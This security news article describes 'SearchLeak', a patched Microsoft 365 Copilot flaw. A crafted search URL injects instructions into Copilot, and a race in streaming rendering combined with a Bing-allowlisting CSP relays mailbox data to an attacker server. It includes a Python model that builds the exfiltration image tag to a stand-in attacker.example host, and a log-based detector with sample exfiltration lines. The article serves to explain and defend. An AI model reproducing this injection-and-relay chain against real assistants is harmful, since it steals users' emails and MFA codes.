SearchLeak: One-Click Microsoft 365 Copilot Flaw Exposed Emails
Researchers at Varonis Threat Labs have disclosed a chain of three vulnerabilities in Microsoft 365 Copilot's Enterprise Search feature that, if exploited, would have allowed an attacker to steal emails, calendar entries, indexed files, and even MFA codes from a victim with a single click on a legitimate microsoft.com link. The researchers dubbed the attack path "SearchLeak" and presented a proof-of-concept at a recent security conference. Microsoft has since assigned CVE-2026-42824 and mitigated the flaw on the backend, confirming that no customer action is required and that no in-the-wild exploitation has been observed. Severity assessments differ: Microsoft rates the bug CVSS 6.5, while the National Vulnerability Database scores it higher at 7.5.
The exploit is a textbook example of how AI assistants inherit and amplify classic web vulnerabilities. It begins with a parameter-to-prompt injection through the `q` parameter of the Copilot Enterprise Search URL: Copilot treats the attacker-controlled text as natural-language instructions rather than as a search query. A crafted URL instructs Copilot to search the user's mailbox, extract an email subject, and embed it inside an `<img>` tag whose `src` points at a Bing image-search URL. Because the link itself lives on a trusted microsoft.com domain, conventional anti-phishing and URL-filtering controls are unlikely to block it. Once the victim clicks, Copilot does the rest; no further interaction is required.
Two legacy web flaws complete the chain. First, a race condition in the response renderer lets the injected `<img>` tag fire and resolve before Microsoft's sanitization wrapper neutralizes it: the browser parses the streaming response as it arrives, while the guardrail is applied only after generation completes, so the image request is already on the wire by the time the tag is stripped. Second, the Content Security Policy on `m365.cloud.microsoft` blocks arbitrary image domains but allowlists `*.bing.com`, and Bing's "Search by Image" endpoint fetches the supplied URL server-side in order to analyze it. The browser therefore only ever contacts an allowlisted origin; the request to the attacker's host originates from Bing's infrastructure, where the page's CSP has no say. Bing effectively becomes the exfiltration proxy, and the attacker reads the stolen data straight from their own web server logs as a request such as `/Your_Security_Code_847291/img.png`.
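To make the two mechanics above concrete, here is a small Python model of the chain, written for this article and not taken from Varonis' proof-of-concept or Microsoft's code. It builds the `<img>` tag the injected prompt would elicit, checks it against an `img-src 'self' *.bing.com` allowlist, and then feeds the response to two renderers: one that parses chunks as they stream in and sanitizes afterwards (the race), and one that buffers and sanitizes before parsing. The attacker host, the extracted subject, and the exact layout of Bing's search-by-image parameters (`iss=sbi`, `q=imgurl:...`) are assumptions for the example.

```python
import html
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Constructed values for this example, not taken from the advisory: the
# attacker's collection host and a mailbox subject standing in for whatever
# the injected prompt told Copilot to extract.
ATTACKER_HOST = "attacker.example"
LEAKED_SUBJECT = "Your_Security_Code_847291"
COPILOT_ORIGIN = "m365.cloud.microsoft"
IMG_SRC_POLICY = ("'self'", "*.bing.com")   # allowlist shape described above

IMG_TAG_RE = re.compile(r"""<img\s[^>]*?src=["']([^"']+)["'][^>]*>""", re.I)


def bing_image_search_url(target: str) -> str:
    """Bing 'search by image' URL that makes Bing fetch `target` server-side.
    The parameter layout (iss=sbi, q=imgurl:...) is an assumption."""
    return ("https://www.bing.com/images/search?view=detailv2&iss=sbi&q="
            + quote("imgurl:" + target, safe=""))


def exfil_img_tag(secret: str) -> str:
    """Markup the injected prompt asks Copilot to emit: the secret becomes a
    path segment on the attacker host, and that URL is wrapped in bing.com."""
    target = f"https://{ATTACKER_HOST}/{quote(secret, safe='')}/img.png"
    return f'<img src="{html.escape(bing_image_search_url(target))}">'


def csp_allows_img(src: str, policy=IMG_SRC_POLICY) -> bool:
    """Minimal img-src matcher: 'self' plus host expressions, where '*.'
    matches subdomains only, as CSP specifies."""
    host = urlsplit(src).hostname or ""
    for source in policy:
        if source == "'self'" and host == COPILOT_ORIGIN:
            return True
        if source.startswith("*.") and host.endswith(source[1:]):
            return True
        if host == source:
            return True
    return False


def sanitize(markup: str) -> str:
    """Stand-in for the post-generation guardrail: drop every <img>."""
    return IMG_TAG_RE.sub("", markup)


class StreamingRenderer:
    """Hands each chunk to the parser as it arrives and sanitizes only after
    generation ends; records the image URLs the browser fetched meanwhile."""

    def __init__(self):
        self.dom = ""
        self.requested = []

    def feed(self, chunk: str) -> None:
        self.dom += chunk
        for match in IMG_TAG_RE.finditer(self.dom):
            url = html.unescape(match.group(1))
            if url not in self.requested and csp_allows_img(url):
                self.requested.append(url)   # request is already on the wire

    def finish(self) -> list:
        self.dom = sanitize(self.dom)        # too late to recall the requests
        return self.requested


class BufferedRenderer:
    """Holds the stream until generation ends, sanitizes, then parses once."""

    def __init__(self):
        self.chunks = []

    def feed(self, chunk: str) -> None:
        self.chunks.append(chunk)

    def finish(self) -> list:
        clean = sanitize("".join(self.chunks))
        return [html.unescape(m.group(1)) for m in IMG_TAG_RE.finditer(clean)
                if csp_allows_img(html.unescape(m.group(1)))]


def render(renderer, response: str, chunk_size: int = 32) -> list:
    """Deliver `response` to a renderer in stream-sized pieces."""
    for i in range(0, len(response), chunk_size):
        renderer.feed(response[i:i + chunk_size])
    return renderer.finish()


def secret_seen_by_attacker(bing_url: str) -> str:
    """What the attacker's web server logs once Bing fetches the wrapped URL:
    the first path segment, which carries the extracted value."""
    q = parse_qs(urlsplit(bing_url).query).get("q", [""])[0]
    target = q[len("imgurl:"):] if q.startswith("imgurl:") else q
    return unquote(urlsplit(target).path.strip("/").split("/")[0])


# A Copilot response of the shape the injected prompt would elicit (constructed).
COPILOT_RESPONSE = ("<p>Here is the subject line you asked about, rendered "
                    "as requested.</p>" + exfil_img_tag(LEAKED_SUBJECT))

if __name__ == "__main__":
    fired = render(StreamingRenderer(), COPILOT_RESPONSE)
    print("streaming renderer fetched:", fired)
    print("attacker log shows:", [secret_seen_by_attacker(u) for u in fired])
    print("buffered renderer fetched:", render(BufferedRenderer(), COPILOT_RESPONSE))
```

The point the model makes is that the CSP check passes, because the only host the browser sees is `www.bing.com`, and the sanitizer runs correctly, just after the streaming parser has already issued the request. Either fix alone (sanitizing before the parser sees a chunk, or not allowlisting a host that fetches arbitrary URLs on the caller's behalf) breaks the chain.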
Because Copilot Enterprise inherits whatever Microsoft Graph permissions the signed-in user holds, an attacker leveraging SearchLeak effectively inherits those permissions as well, without ever supplying credentials. The single-click path covers the full read scope: mailbox content, calendar metadata, SharePoint-indexed documents, and one-time codes delivered by email. The flaw underscores how the attack surface of enterprise AI tools extends well beyond the model itself into the surrounding web stack, where familiar weaknesses such as parameter-to-prompt injection, race conditions, and overly permissive CSPs can be reassembled into a modern data-exfiltration pipeline. Organizations should treat this as a reminder to audit Copilot and similar assistants for chained-vulnerability risk, and to monitor Bing image-search traffic from enterprise ranges for requests that carry third-party image URLs.
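The monitoring recommendation above is easy to operationalize, because the exfiltration leaves a distinctive trace in the victim's own outbound proxy logs: a request to a Bing image endpoint whose query string carries a URL on a host the organization does not own. The following detector is an added example written for this article, not tooling from Varonis or Microsoft. The log format, the five sample lines, and the list of image hosts treated as trusted are all constructed; the two alerts it raises use the same path-segment convention as the PoC's `/Your_Security_Code_847291/img.png`.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed proxy log lines (format: "<ts> <client_ip> <method> <url>").
# Lines 2 and 5 model the relayed exfiltration request; the rest are benign.
SAMPLE_LOG = """\
2026-05-02T09:14:03Z 10.20.1.15 GET https://www.bing.com/images/search?q=quarterly+report+cover&form=HDRSC2
2026-05-02T09:14:09Z 10.20.1.15 GET https://www.bing.com/images/search?view=detailv2&iss=sbi&q=imgurl%3Ahttps%3A%2F%2Fattacker.example%2FYour_Security_Code_847291%2Fimg.png
2026-05-02T09:15:41Z 10.20.1.77 GET https://www.bing.com/images/search?view=detailv2&iss=sbi&q=imgurl%3Ahttps%3A%2F%2Fcontoso.sharepoint.com%2Fsites%2Fmkt%2Flogo.png
2026-05-02T09:16:02Z 10.20.1.77 GET https://th.bing.com/th/id/OIP.abc123?pid=ImgDet
2026-05-02T09:17:30Z 10.20.1.15 GET https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https%3A%2F%2Fcdn.attacker.example%2FRe%3A+Board+minutes+Q2%2Fimg.png
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
EMBEDDED_URL_RE = re.compile(r"https?://.+", re.I)
RELAY_HOSTS = ("bing.com",)
# Hosts whose images a user could plausibly submit to Bing on purpose. This
# list is an assumption for the example and should be tuned per tenant.
TRUSTED_IMAGE_HOSTS = ("bing.com", "microsoft.com", "sharepoint.com", "office.com")


def host_matches(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def embedded_urls(url):
    """Every URL carried inside the query string, whether passed as
    imgurl=... or as q=imgurl:... (names vary, so every value is checked)."""
    found = []
    for values in parse_qs(urlsplit(url).query).values():
        for value in values:
            m = EMBEDDED_URL_RE.search(value)
            if m:
                found.append(m.group(0))
    return found


def analyze(line):
    """Alert dict for a Bing image request that relays a third-party URL,
    otherwise None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, _method, url = m.groups()
    parts = urlsplit(url)
    if not host_matches(parts.hostname or "", RELAY_HOSTS) or "/images/" not in parts.path:
        return None
    for target in embedded_urls(url):
        t = urlsplit(target)
        if host_matches(t.hostname or "", TRUSTED_IMAGE_HOSTS):
            continue
        return {
            "ts": ts,
            "client": client,
            "relay": parts.hostname,
            "target_host": t.hostname,
            # in the PoC the leaked value is the first path segment
            "leaked": unquote(t.path).strip("/").split("/")[0],
        }
    return None


def scan(log_text):
    """Run analyze() over a log and return the alerts in log order."""
    return [alert for alert in map(analyze, log_text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['client']} -> {alert['relay']} relays "
              f"{alert['target_host']} leaked={alert['leaked']!r}")
```

Two design choices matter here. The detector does not key on a particular parameter name, since Bing exposes the same capability under more than one URL shape, and it does not try to recognize "secret-looking" content, since any mailbox subject or calendar title is a leak; the signal is simply a Bing relay request that references a host outside the tenant's trust list. Alerts clustered on one client within a short window, as in the sample, are the pattern to escalate.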